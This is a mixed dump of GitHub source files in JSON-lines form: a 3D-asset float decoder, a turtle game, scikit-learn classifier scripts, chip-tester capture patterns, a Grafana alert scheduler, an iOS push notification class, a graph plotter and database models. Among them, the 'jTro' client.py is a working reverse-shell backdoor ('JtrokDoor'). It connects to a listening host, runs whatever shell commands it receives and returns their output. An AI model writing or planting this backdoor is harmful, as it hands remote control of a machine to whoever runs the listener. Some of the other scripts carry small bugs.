self.m_floatBits = 0\n self.m_floatBits |= s << 31\n self.m_floatBits |= e << 23\n self.m_floatBits |= m\n\n res = struct.unpack('f', self.m_floatBits.to_bytes(4, 'little'))[0]\n\n # Fixed point\n elif self.m_numMantissaBits:\n flim = maskTable[self.m_numMantissaBits]\n\n # Signed fixed point\n if self.m_numSignBits:\n # sign extend?\n val = bits\n if val & signMaskTable [self.m_numMantissaBits]:\n val |= signExtendTable[self.m_numMantissaBits]\n val = struct.unpack('i', val.to_bytes(4, byteorder='little'))[0]\n res = val / flim\n else: # Unsigned fixed point\n res = bits / flim\n # print(\"Decode - %d -> %f (%d, %d, %d)\" % (bits, res, self.m_numSignBits, self.m_numExponentBits, self.m_numMantissaBits))\n return res\n\n\n#edge_dma\nclass EdgeDmaListElement:\n def __init__(self, data, endianSwap):\n self.size, self.eal = struct.unpack(('<', '>')[endianSwap] + 'II', data[:8])\n\n\n","repo_name":"Team-Alua/Noesis-EdgeLib","sub_path":"EdgeData20.py","file_name":"EdgeData20.py","file_ext":"py","file_size_in_byte":15347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5317222159","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\nplayer = Player()\ncar_manager = CarManager()\nscore_board = Scoreboard()\n\nScreen().listen()\nScreen().onkey(fun=player.move_forward, key=\"Up\")\n\ngame_is_on = True\n\nwhile game_is_on:\n time.sleep(player.level)\n screen.update()\n car_manager.create_car()\n\n# Step 1 Turtle: Creation, Movement, and reset.\n if player.ycor() > 280:\n player.reset()\n score_board.level_up()\n\n\n# Step 2 Creation of cars, Movement and deletion.\n for car in car_manager.all_cars:\n car_manager.move(car)\n# Step 3 increase speed of cars when turtle is reset.\n # DONE\n# Step 3 Collision with turtle and car: end game\n for car in car_manager.all_cars:\n if (player.ycor() > car.ycor() - 20 and player.ycor() < car.ycor() + 20 and player.xcor() > car.xcor() - 20\n and player.xcor() < car.xcor() + 20):\n score_board.game_over()\n game_is_on = False\n\n# Step 4 Scoreboard: increase when turtle is reset.\n\n\nscreen.exitonclick()\n\n\n\n\n\n\n\n\n","repo_name":"ahes0001/100_Days_Of_Python","sub_path":"Day_23_Turtle_Crossing_Captone/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32403558457","text":"from sklearn import datasets\nimport matplotlib.pyplot as plt\nfrom plot_decision_regions import plot_decision_regions\nimport numpy as np\n# Iris データセットをロード\niris = datasets.load_iris()\n# 3,4列目の特徴量を抽出\nX = iris.data[:, [2, 3]]\n# クラスラベルを取得\ny = iris.target\n\nfrom sklearn.cross_validation import train_test_split\n# トレーニングデータとテストデータに分割\n# 全体の30%をテストデータにする\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\n# トレーニングデータの平均と標準偏差を計算\nsc.fit(X_train)\n# 平均と標準偏差を用いて標準化\nX_train_std = sc.transform(X_train)\nX_test_std = sc.transform(X_test)\n\nfrom sklearn.linear_model import Perceptron\nppn = Perceptron(n_iter=40, eta0=0.1, random_state=0, shuffle=True)\n# トレーニングデータをモデルに適合させる\nppn.fit(X_train_std, y_train)\n\n# テストデータで予測を実施\ny_pred = ppn.predict(X_test_std)\nprint('Misclassified samples: %d' % (y_test != y_pred).sum())\n\nfrom sklearn.metrics import accuracy_score\n# 分類の正解率を表示\nprint('Accuracy: %.2f' % accuracy_score(y_test, y_pred))\n\n# トレーニングデータとテストデータの特徴量を行方向に結合\nX_combined_std = np.vstack((X_train_std, X_test_std))\n# トレーニングデータとテストデータのクラスラベルを結合\ny_combined = np.hstack((y_train, y_test))\n# 決定境界のプロット\nplot_decision_regions(X=X_combined_std, y=y_combined, classifier=ppn, test_idx=range(105,150))\n\nplt.xlabel('petal length [standardized]')\nplt.ylabel('petal width [standardized]')\n# 凡例の設定(左上に配置)\nplt.legend(loc='upper left')\nplt.show()\n","repo_name":"kazuhei/python-machine-larning-edu","sub_path":"chapter3/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21292516150","text":"import pandas as pd\r\ndata = pd.read_csv('regression_dataset.csv')\r\n\r\nX=data.loc[:, data.columns != 'y']\r\nY=data['y']\r\n\r\n\r\nfrom sklearn.utils import shuffle\r\ndata= shuffle(data).reset_index(drop=True)\r\nX=data.loc[:, data.columns != 'y']\r\nY=data['y']\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.25, random_state=100)\r\nprint ('Number of samples in training data:',len(x_train))\r\nprint ('Number of samples in validation data:',len(x_test))\r\n#train logistic regression\r\nfrom sklearn import linear_model\r\nlogreg_model = linear_model.LogisticRegression()\r\nprint ('Training a logistic Regression Model..')\r\nlogreg_model.fit(x_train, y_train)\r\ntraining_accuracy= round(logreg_model.score(x_train, y_train) * 100, 2)\r\nprint('Accuraacy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(logreg_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuraacy of the model on test data: ',test_accuracy)\r\nparameters = logreg_model.get_params()\r\nprint('parameters of this model:\\n',parameters)\r\ncoefficients = logreg_model.coef_\r\nprint('coefficients of this model:\\n',coefficients)\r\ninterceptions = logreg_model.intercept_\r\nprint('interceptions of this model:\\n',interceptions)\r\n\r\nfrom sklearn import svm\r\nsvc = svm.SVC()\r\nprint ('Training a SVM Model..')\r\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=100)\r\nsvc.fit(x_train, y_train)\r\ntrain_accuracy= round(svc.score(x_train, y_train) * 100, 2)\r\nprint('Accuraacy of the model on training data: ',training_accuracy)\r\ntest_accuracy= round(svc.score(x_test, y_test) * 100, 2)\r\nprint('Accuraacy of the model on test data: ',test_accuracy)\r\n\r\nfrom sklearn import linear_model\r\nperceptron_model=linear_model.Perceptron()\r\nprint ('Training a perceptron Model..')\r\nperceptron_model.fit(x_train, y_train)\r\ntraining_accuracy=round(perceptron_model.score(x_train, y_train) * 100, 2)\r\nprint('Accuraacy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(perceptron_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuraacy of the model on test data: ',test_accuracy)\r\n\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors = 3)\r\nknn.fit(x_train, y_train)\r\nprint ('Training a KMeans Model..')\r\ntraining_accuracy= round(knn.score(x_train, y_train) * 100, 2)\r\nprint('Accuraacy of the model on training data: ',training_accuracy)\r\ntest_accuracy= round(knn.score(x_test, y_test) * 100, 2)\r\nprint('Accuraacy of the model on test data: ',test_accuracy)\r\n\r\nimport xgboost as xgb\r\nxgb_model = xgb.XGBClassifier(n_estimators=1000)\r\nprint ('Training a xgboost Model..')\r\nxgb_model.fit(x_train, y_train, eval_metric='mlogloss')\r\ntraining_accuracy=round(xgb_model.score(x_train, y_train) * 100, 2)\r\nprint('Accuraacy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(xgb_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuraacy of the model on test data: ',test_accuracy)\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nrandomforest_model = RandomForestClassifier(n_estimators=1000)\r\nprint ('Training a random forest Model..')\r\nrandomforest_model.fit(x_train, y_train)\r\ntraining_accuracy=round(randomforest_model.score(x_train, y_train) * 100, 2)\r\nprint('Accuraacy of the model on training data: ',training_accuracy)\r\ntest_accuracy=round(randomforest_model.score(x_test, y_test) * 100, 2)\r\nprint('Accuraacy of the model on test data: ',test_accuracy)\r\n","repo_name":"rebeccalysaght/DataXFinalProject","sub_path":"final_all_codes/code files/regression including logistic.py","file_name":"regression including logistic.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2439094317","text":"with Pattern(pin_header=\"cap_test\") as pat:\n tester = origen.tester\n portc = origen.dut.pin(\"portc\")\n reg = origen.dut.reg1\n dut().timeset('simple').symbol_map['A'] = 'A'\n dut().timeset('simple').symbol_map['B'] = 'B'\n\n tester.cc(\"Basics\")\n tester.cc(\"---\")\n tester.cc(\"Capture a single cycle\")\n tester.capture().cycle()\n tester.cycle()\n tester.cc(\"Capture a single cycle on portc\")\n tester.capture(pins=[\"portc\"]).cycle()\n tester.cycle()\n tester.cc(\"Capture two cycles on portc\")\n tester.capture(pins=[\"portc\"], cycles=2).repeat(2)\n tester.cc(\"Capture three cycles on portc with symbol 'A'\")\n tester.capture(pins=[\"portc\"], cycles=3, symbol=\"A\").repeat(3)\n tester.cc(\"Capture four cycles on portc with symbol 'B'\")\n tester.capture(pins=[\"portc\"], cycles=4, symbol=\"B\").repeat(2)\n tester.repeat(2)\n tester.cc(\"Capture four cycles on portc and clk\")\n tester.capture(pins=[\"portc\", \"clk\"], cycles=4).repeat(10)\n\n tester.cc(\"Basics with implied pins (portc)\")\n tester.cc(\"---\")\n tester.cc(\"Capture next cycle (portc)\")\n portc.capture(cycles=1).cycle()\n tester.cycle()\n tester.cc(\"Capture next two cycles (portc)\")\n portc.capture(cycles=2).repeat(2)\n tester.cycle()\n tester.cc(\"Capture next two cycles with symbol 'A' (portc)\")\n portc.capture(cycles=2, symbol=\"A\").repeat(2)\n tester.cycle()\n tester.cc(\n \"Capture next two cycles with symbol 'B' masking the second bit (portc)\"\n )\n portc.capture(cycles=2, symbol=\"B\", mask=0x2).repeat(2)\n tester.cycle()\n\n tester.cc(\"Two captures with symbols\")\n tester.cc(\"---\")\n tester.cc(\"This however, is fine.\")\n portc.capture(cycles=2, symbol=\"A\").repeat(2)\n portc.capture(cycles=2, symbol=\"B\").repeat(2)\n tester.cycle()\n\n origen.dut.arm_debug.switch_to_swd()\n tester.cc(\"Capturing a register (using arm debug)\")\n tester.cc(\"---\")\n tester.cc(\"Capture 'reg1'\")\n reg.capture()\n tester.cc(\"Capture 'reg1' with symbol 'A'\")\n reg.capture(symbol='A')\n tester.cc(\"Capture 'reg1' with symbol 'B' and mask 0xFFFF\")\n reg.capture(mask=0xFFFF, symbol='B')\n\n # tester.cc(\"Verify with capture options\")\n # tester.cc(\"---\")\n # tester.cc(\"Verify 'reg1' with data 0 while capturing\")\n reg.set_data(0xCECE_CECE)\n # reg.verify(capture=True)\n # tester.cc(\"Verify 'reg1' with data 0 while capturing with symbol 'A'\")\n # reg.verify(capture={\"symbol\": 'A'})\n # tester.cc(\"Verify 'reg1' with data 0 while capturing with symbol 'B' and mask 0xFFFF\")\n # reg.verify(capture={\"symbol\": 'B', \"mask\": 0xFFFF})\n\n tester.cc(\n \"Verify with captures previously set. Next two transactions will be captured and verified\"\n )\n tester.cc(\"---\")\n tester.cc(\"Capture next two transactions\")\n reg.set_capture()\n reg.verify()\n reg.verify()\n reg.clear_capture()\n tester.cc(\"This should not be captured\")\n reg.verify()\n\n # Changing capture configuration\n with tester.eq(\"v93k\") as v93k:\n tester.cc(\"--Should only render on v39k--\")\n tester.cycle()\n # tester.capture_config.digcap.method = \"digcap\"\n # tester.capture_config.symbol = \"E\"\n # tester.capture(cycles=4)\n # tester.capture_config.digcap.method = None\n # tester.capture_config.symbol = None\n # tester.capture(cycles=4)\n\n # To Do: Capture with Options\n","repo_name":"Origen-SDK/o2","sub_path":"test_apps/python_app/example/patterns/captures.py","file_name":"captures.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"73092961764","text":"#!usr/bin/python3\nimport socket\nimport subprocess\n\n\nclass JtrokDoor:\n def __init__(self, host, port):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n self.sock.connect((host, port))\n\n def execute(self, command):\n return subprocess.check_output(command, shell=True)\n\n def run(self):\n while True:\n command = self.sock.recv(1024)\n cmd_result = self.execute(command)\n self.sock.send(cmd_result)\n\n sock.close()\n\n\njtro_door = JtrokDoor('127.0.0.1', 4545)\njtro_door.run()\n","repo_name":"jakiiii/jTro","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24850786103","text":"import itertools\nimport pickle\nimport random\nimport matplotlib\nimport networkx as nx\n\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom config import *\n\n\ndef plot(nodes, edges, group, suffix):\n\tcolors = [(0, 'w'), (1, 'r'), (2, 'g'), (3, 'b'), (4, 'y')]\n\tG = nx.Graph()\n\tG.add_nodes_from(nodes)\n\tG.add_edges_from(edges)\n\tpos = nx.spring_layout(G)\n\n\tnx.draw_networkx_nodes(G, pos, nodelist=[node for node in nodes if node not in group], node_color='w', node_size=120)\n\tfor g_id, color in colors:\n\t\tnx.draw_networkx_nodes(G, pos, nodelist=[node for node in nodes if node in group and group[node] == g_id],\n\t\t node_color=color, node_size=600)\n\tnx.draw_networkx_edges(G, pos,\n\t edgelist=[edge for edge in edges if edge[0] in graph.author_labels and edge[1] in graph.author_labels], width=4.0)\n\tnx.draw_networkx_edges(G, pos,\n\t edgelist=[edge for edge in edges if edge[0] not in graph.author_labels or edge[1] not in graph.author_labels], width=1.0)\n\tnx.draw_networkx_labels(G, pos, labels={node: node for node in nodes if node in graph.author_labels}, font_size=20)\n\tnx.draw_networkx_labels(G, pos, labels={node: node for node in nodes if node not in graph.author_labels}, font_size=12)\n\tplt.tight_layout()\n\taxis = plt.gca()\n\taxis.axes.get_xaxis().set_visible(False)\n\taxis.axes.get_yaxis().set_visible(False)\n\tplt.savefig(output_directory + suffix + '.png', dpi=200)\n\tplt.close()\n\n\n\ndef read_graph(suffix):\n\twith open(cwd + 'nodes_' + suffix + '.pkl', 'rb') as f:\n\t\tnodes = pickle.load(f)\n\twith open(cwd + 'edges_' + suffix + '.pkl', 'rb') as f:\n\t\tedges = pickle.load(f)\n\treturn nodes, edges\n\n\ndef read_test():\n\ttest_authors = defaultdict(set)\n\twith open(args.test_file) as f:\n\t\tfor line in f:\n\t\t\tsplits = line.rstrip().split('\\t')\n\t\t\ttest_authors[splits[0].replace('_', ' ')] = int(splits[1])\n\treturn test_authors\n\n\nclass Network(object):\n\tdef __init__(self):\n\t\tnodes_baseline, edges_baseline = read_graph('baseline')\n\t\tnodes_rl, edges_rl = read_graph('rl')\n\t\tself.author_labels = read_test()\n\n\t\tself.neighbors_baseline = {node: set() for node in nodes_baseline}\n\t\tself.neighbors_rl = {node: set() for node in nodes_rl}\n\n\t\tfor edge in edges_baseline:\n\t\t\tself.neighbors_baseline[edge[0]].add(edge[1])\n\t\t\tself.neighbors_baseline[edge[1]].add(edge[0])\n\n\t\tfor edge in edges_rl:\n\t\t\tself.neighbors_rl[edge[0]].add(edge[1])\n\t\t\tself.neighbors_rl[edge[1]].add(edge[0])\n\n\t\tself.dangling = set([node for node in self.neighbors_baseline if not bool(self.neighbors_baseline[node])])\n\t\tself.connected = set([node for node in self.neighbors_rl if bool(self.neighbors_rl[node] & self.dangling)]) | self.dangling\n\n\n\tdef edges(self, nodes):\n\t\tedges = set()\n\t\tfor node, neighbors in self.neighbors_rl.items():\n\t\t\tif node in nodes:\n\t\t\t\tintersect = neighbors & nodes\n\t\t\t\tif bool(intersect):\n\t\t\t\t\tfor neighbor in intersect:\n\t\t\t\t\t\tself.add_edge(edges, node, neighbor)\n\t\treturn edges\n\n\tdef colored(self):\n\t\treturn set(self.neighbors_baseline.keys())\n\n\tdef is_connected(self, n1, n2, order=0):\n\t\tif order == 0:\n\t\t\treturn n1 == n2\n\t\tif len(self.neighbors_baseline[n1]) == 0:\n\t\t\treturn False\n\t\treturn reduce(lambda x, y: x or y, [self.is_connected(n, n2, order - 1) for n in self.neighbors_baseline[n1]])\n\n\tdef baseline(self):\n\t\t# black_list = set()\n\t\tblack_list = set(['Yizhou Sun', 'Jing Gao', 'Dong Xin', 'Wei Wang', 'Wei Lu', 'Manish Gupta', 'Hong Cheng', 'Wenmin Li', 'Chen Chen'])\n\t\tnodes = set()\n\t\tcolored = self.colored()\n\t\tfor node, nbs in self.neighbors_rl.items():\n\t\t\tif node in black_list:\n\t\t\t\tcontinue\n\t\t\tneighbors = nbs & colored\n\t\t\tif node not in self.neighbors_baseline:\n\t\t\t\tfor pair in itertools.combinations(neighbors, 2):\n\t\t\t\t\tif pair[0] in black_list or pair[1] in black_list:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif self.author_labels[pair[0]] == self.author_labels[pair[1]]:\n\t\t\t\t\t\tif not self.is_connected(pair[0], pair[1], 4):\n\t\t\t\t\t\t\tnodes.add(pair[0])\n\t\t\t\t\t\t\tnodes.add(pair[1])\n\t\t\telse:\n\t\t\t\tfor neighbor in neighbors:\n\t\t\t\t\tif neighbor in black_list:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif self.author_labels[node] != self.author_labels[neighbor]:\n\t\t\t\t\t\tnodes.add(node)\n\t\t\t\t\t\tnodes.add(neighbor)\n\t\tedges = self.edges(nodes)\n\t\treturn list(nodes), list(edges)\n\n\tdef add_edge(self, edges, n1, n2):\n\t\tif (n1, n2) not in edges and (n2, n1) not in edges:\n\t\t\tedges.add((n1, n2))\n\n\tdef rl1(self, baseline_nodes, baseline_edges):\n\t\tcolored = self.colored()\n\t\tnodes = set()\n\t\tedges = set()\n\t\tfor (n1, n2) in itertools.combinations(baseline_nodes, 2):\n\t\t\tif self.author_labels[n1] == self.author_labels[n2] and n2 not in self.neighbors_baseline[n1]:\n\t\t\t\tintersect = self.neighbors_rl[n1] & self.neighbors_rl[n2]\n\t\t\t\tif bool(intersect):\n\t\t\t\t\tnodes.add(n1)\n\t\t\t\t\tnodes.add(n2)\n\t\t\t\tfor nb in intersect:\n\t\t\t\t\tif nb not in colored:\n\t\t\t\t\t\tnodes.add(nb)\n\t\t\t\t\t\tself.add_edge(edges, n1, nb)\n\t\t\t\t\t\tself.add_edge(edges, n2, nb)\n\t\tfor edge in baseline_edges:\n\t\t\tif self.author_labels[edge[0]] == self.author_labels[edge[1]]:\n\t\t\t\tedges.add(edge)\n\t\treturn list(nodes), list(edges)\n\n\tdef rl2(self, baseline_nodes, baseline_edges):\n\t\tcolored = self.colored()\n\t\tnodes = set()\n\t\tedges = set()\n\t\tfor edge in baseline_edges:\n\t\t\tif self.author_labels[edge[0]] != self.author_labels[edge[1]]:\n\t\t\t\tnodes.add(edge[0])\n\t\t\t\tnodes.add(edge[1])\n\t\t\t\tedges.add(edge)\n\t\t\t\tnbs1 = self.neighbors_rl[edge[0]] - colored\n\t\t\t\tnbs2 = self.neighbors_rl[edge[1]] - colored\n\t\t\t\tfor nb1 in nbs1:\n\t\t\t\t\tratio = 4.0 / len(nbs1)\n\t\t\t\t\tif random.uniform(0, 1) < ratio:\n\t\t\t\t\t\tnodes.add(nb1)\n\t\t\t\t\t\tself.add_edge(edges, edge[0], nb1)\n\t\t\t\tfor nb2 in nbs2:\n\t\t\t\t\tratio = 4.0 / len(nbs2)\n\t\t\t\t\tif random.uniform(0, 1) < ratio:\n\t\t\t\t\t\tnodes.add(nb2)\n\t\t\t\t\t\tself.add_edge(edges, edge[1], nb2)\n\t\treturn list(nodes), list(edges)\n\n\tdef rl3(self, baseline_nodes, baseline_edges):\n\t\treturn None, None\n\n\nif __name__ == '__main__':\n\tcwd = 'data/'\n\toutput_directory = 'plot/'\n\tgraph = Network()\n\tbaseline_authors, baseline_links = graph.baseline()\n\t# plot(baseline_authors, baseline_links, graph.author_labels, args.plot_path)\n\tauthors1, links1 = graph.rl1(baseline_authors, baseline_links)\n\tauthors2, links2 = graph.rl2(baseline_authors, baseline_links)\n\tfor i in range(50):\n\t\tplot(authors1, links1, graph.author_labels, 'rl1.' + str(i))\n\t\t# plot(authors2, links2, graph.author_labels, 'rl2.' + str(i))\n","repo_name":"yangji9181/cube2net","sub_path":"plot4.py","file_name":"plot4.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"5917576265","text":"import yaml\nimport schedule\nimport requests\nimport time\nimport logging\n\nlogging.basicConfig(handlers=[\n logging.FileHandler(\"log/data.log\"),\n logging.StreamHandler()],\n format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.DEBUG)\n\nlogger = logging.getLogger(\"grafana_silence\")\n\n\ndef do_silence(alert_id, target):\n logger.info(f\"Running silence for {alert_id}\")\n response = requests.post(f\"{target['url']}/api/alerts/{alert_id}/pause\", headers={\n 'Authorization': f\"Bearer {target['token']}\"}, data={'paused': True})\n logger.debug(\"Status code:\", response.status_code)\n logger.debug(\"Response:\", response.text)\n\n\ndef do_unsilence(alert_id, target):\n logger.info(f\"Running unsilence for {alert_id}\")\n response = requests.post(f\"{target['url']}/api/alerts/{alert_id}/pause\", headers={\n 'Authorization': f\"Bearer {target['token']}\"}, data={'paused': False})\n logger.debug(\"Status code:\", response.status_code)\n logger.debug(\"Response:\", response.text)\n\n\ndef timestring_to_minutes(timestamp):\n return int(timestamp.split(':')[0]) * 60 + int(timestamp.split(':')[1])\n\n\ndef minutes_to_timestring(minutes):\n return f\"{str((minutes // 60) % 24).rjust(2, '0')}:{str(minutes % 60).rjust(2, '0')}\"\n\n\ndef get_silence_time(start_time, end_time):\n start_minutes = timestring_to_minutes(start_time)\n end_minutes = timestring_to_minutes(end_time)\n if end_minutes < start_minutes:\n end_minutes += 24 * 60\n silence_times = []\n while start_minutes < end_minutes:\n silence_times.append(minutes_to_timestring(start_minutes))\n start_minutes += 8 * 60\n return silence_times\n\n\ndef init(alert_id, start_time, end_time, target):\n logger.info(\n f\"Registering alert silence for {alert_id} start at {start_time} end at {end_time}\")\n silence_times = get_silence_time(start_time, end_time)\n for silence_time in silence_times:\n schedule.every().day.at(silence_time).do(lambda: do_silence(alert_id, target))\n schedule.every().day.at(end_time).do(lambda: do_unsilence(alert_id, target))\n\n\nif __name__ == \"__main__\":\n with open('config.yaml', 'r') as file:\n data = yaml.safe_load(file)\n for silence in data['silences']:\n try:\n target = [target for target in data['targets']\n if target['name'] == silence['target']][0]\n init(silence['alert_id'], silence['start_time'],\n silence['end_time'], target)\n except Exception as e:\n logger.error(e)\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"bahybintang/grafana-silence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36406775929","text":"#coding=utf-8\nimport json\n# from umengnotification import UmengNotification\nfrom umessage.umengnotification import UmengNotification\n\nclass IOSNotification(UmengNotification):\n\n APS_KEYS = [\"alert\", \"badge\", \"sound\", \"content-available\"]\n\n def setPredefinedKeyValue(self, key, value):\n if key in self.ROOT_KEYS:\n self.rootJson[key] = value\n elif key in self.APS_KEYS:\n apsJson = json.loads('{}')\n payloadJson = json.loads('{}')\n if \"payload\" in self.rootJson:\n payloadJson = self.rootJson[\"payload\"]\n else:\n self.rootJson[\"payload\"] = payloadJson\n if \"aps\" in payloadJson:\n apsJson = payloadJson[\"aps\"]\n else:\n payloadJson[\"aps\"] = apsJson\n apsJson[key] = value\n elif key in self.POLICY_KEYS:\n policyJson = json.loads('{}')\n if \"policy\" in self.rootJson:\n policyJson = self.rootJson[\"policy\"]\n else:\n self.rootJson[\"policy\"] = policyJson\n policyJson[key] = value\n else:\n if key in [\"payload\",\"aps\",\"policy\"]:\n print(\"You don't need to set value for %s, just set values for the sub keys in it.\" % key)\n else:\n print(\"Unknownd key: %s\" % key)\n\n def setAlert(self, alert):\n self.setPredefinedKeyValue(\"alert\", alert)\n\n def setBadge(self, badge):\n self.setPredefinedKeyValue(\"badge\", badge)\n\n def setSound(self, sound):\n self.setPredefinedKeyValue(\"sound\", sound)\n\n def setContentAvailable(self, contentAvailable):\n self.setPredefinedKeyValue(\"content-available\", contentAvailable)\n\n def setCustomizedField(self, key, value):\n payloadJson = json.loads('{}')\n if \"payload\" in self.rootJson:\n payloadJson = self.rootJson[\"payload\"]\n else:\n self.rootJson[\"payload\"] = payloadJson\n payloadJson[key] = value","repo_name":"OPN48/umeng_push","sub_path":"src/umessage/iosnotification.py","file_name":"iosnotification.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"2771685917","text":"\"\"\"Creates the database models with ability to perform SQL functions\"\"\"\nfrom passlib.handlers.bcrypt import bcrypt\n\nimport v1.models\nfrom datetime import datetime\nfrom run import db\n\n\nclass DBBaseModel(v1.models.BaseModel):\n \"\"\"\n Base Database models for transactions\n \"\"\"\n __table__ = \"\"\n\n def __init__(self, created_at, updated_at):\n super().__init__(created_at, updated_at)\n\n @classmethod\n def migrate(cls):\n \"\"\"\n Create the tables here\n :return:\n \"\"\"\n pass\n\n @classmethod\n def rollback(cls):\n \"\"\"\n Deletes all the data from the tables\n :param cls:\n :return:\n \"\"\"\n db.cursor.execute(\"DELETE FROM {}\".format(cls.__table__))\n\n db.connection.commit()\n\n @classmethod\n def deserialize(cls, dictionary):\n \"\"\" Create a model object from the dictionary,\n Override this method to do the conversion custom\n \"\"\"\n return cls(datetime.now(), datetime.now())\n\n @classmethod\n def query_all(cls):\n \"\"\"\n Query all items from the database\n :return:\n \"\"\"\n db.cursor.execute(\"SELECT * FROM {}\".format(cls.__table__))\n items = db.cursor.fetchall()\n return [cls.deserialize(x) for x in items]\n\n @classmethod\n def query_one_by_field(cls, field, value):\n \"\"\"Get one item from the database\"\"\"\n items = cls.query_by_field(field, value)\n if len(items) == 0:\n return None\n return items[0]\n\n @classmethod\n def query_by_field(cls, field, value):\n \"\"\"\n Query items from the database based on a particular field\n :param field:\n :param value:\n :return:\n \"\"\"\n db.cursor.execute(\"SELECT * FROM {0} WHERE {1} = %s\".format(cls.__table__, field), (value,))\n items = db.cursor.fetchall()\n\n return [cls.deserialize(x) for x in items]\n\n @classmethod\n def query_by_id(cls, _id):\n \"\"\"\n Query items from the database by id\n :param _id:\n :return:\n \"\"\"\n db.cursor.execute(\"SELECT * FROM {} WHERE id = %s\".format(cls.__table__), (_id,))\n item = db.cursor.fetchone()\n if item is None:\n return None\n return cls.deserialize(item)\n\n def save(self):\n \"\"\" Save an item to the database\"\"\"\n result = db.cursor.fetchone()\n if result is not None:\n self.id = result['id']\n db.connection.commit()\n\n def update(self):\n \"\"\"\n Updates the details of an item\n :return:\n \"\"\"\n self.updated_at = datetime.now()\n pass\n\n def delete(self):\n \"\"\"\n Deletes an item from the database\n :return:\n \"\"\"\n db.cursor.execute(\"DELETE FROM {} WHERE id = %s\".format(self.__table__), (self.id))\n db.connection.commit()\n\n\nclass User(v1.models.User, DBBaseModel):\n \"\"\"\n Creates a user with different roles\n \"\"\"\n __table__ = \"users\"\n\n @classmethod\n def migrate(cls):\n db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS users(\n id serial PRIMARY KEY ,\n firstname varchar,\n lastname varchar,\n username varchar,\n email varchar,\n password varchar,\n created_at timestamp,\n updated_at timestamp,\n role varchar)\"\"\")\n db.connection.commit()\n\n @classmethod\n def deserialize(cls, dictionary):\n user = User()\n user.id = dictionary['id']\n user.firstname = dictionary['firstname']\n user.lastname = dictionary['lastname']\n user.username = dictionary['username']\n user.email = dictionary['email']\n user.password = dictionary['password']\n user.created_at = dictionary['created_at']\n user.updated_at = dictionary['updated_at']\n user.role = dictionary['role']\n\n return user\n\n @staticmethod\n def get_by_username(username):\n \"\"\"\n Get user based on the username\n :param username:\n :return:\n \"\"\"\n return User.query_by_field(\"username\", username)\n\n def save(self):\n \"\"\"\n Save the user into the database\n :return:\n \"\"\"\n db.cursor.execute(\n \"INSERT INTO users(firstname,lastname,username,email,\"\n \"password,created_at,updated_at, role) VALUES(%s,%s,%s,%s,%s,%s,%s, %s) RETURNING id\", (\n self.firstname, self.lastname, self.username, self.email,\n self.password, self.created_at,\n self.updated_at, self.role\n ))\n super().save()\n\n def update(self):\n \"\"\"\n Update the details of the user\n :return:\n \"\"\"\n super().update()\n db.cursor.execute(\n \"UPDATE users SET firstname = %s, lastname = %s, username = %s,\"\n \"email = %s, password = %s, updated_at = now(), role = %s where id = %s\", (\n self.firstname, self.lastname, self.username,\n self.email, self.password, self.role,\n self.id))\n db.connection.commit()\n\n def requests(self):\n \"\"\"\n Get all the requests for this user\n :return:\n \"\"\"\n return Request.query_by_field(\"created_by\", self.id)\n\n def is_admin(self):\n \"\"\"\n To check whether a user is an administrator\n :return:\n \"\"\"\n return self.role == User.ROLE_ADMINISTRATOR\n\n def notifications(self):\n \"\"\"\n Get all the notifications sent to this user\n :return:\n \"\"\"\n\n return Notification.query_by_field(\"user_id\", self.id)\n\n\nclass Admin(User):\n \"\"\"\n Contains implementation for creating a default admin from the super class\n \"\"\"\n\n def __init__(self, firstname=\"\", lastname=\"\", email=\"\", username=\"\", password=\"\", profile_picture=\"\",\n created_at=datetime.now(), updated_at=datetime.now()):\n super().__init__(firstname, lastname, email, username, password, profile_picture, created_at, updated_at)\n self.role = User.ROLE_ADMINISTRATOR\n\n 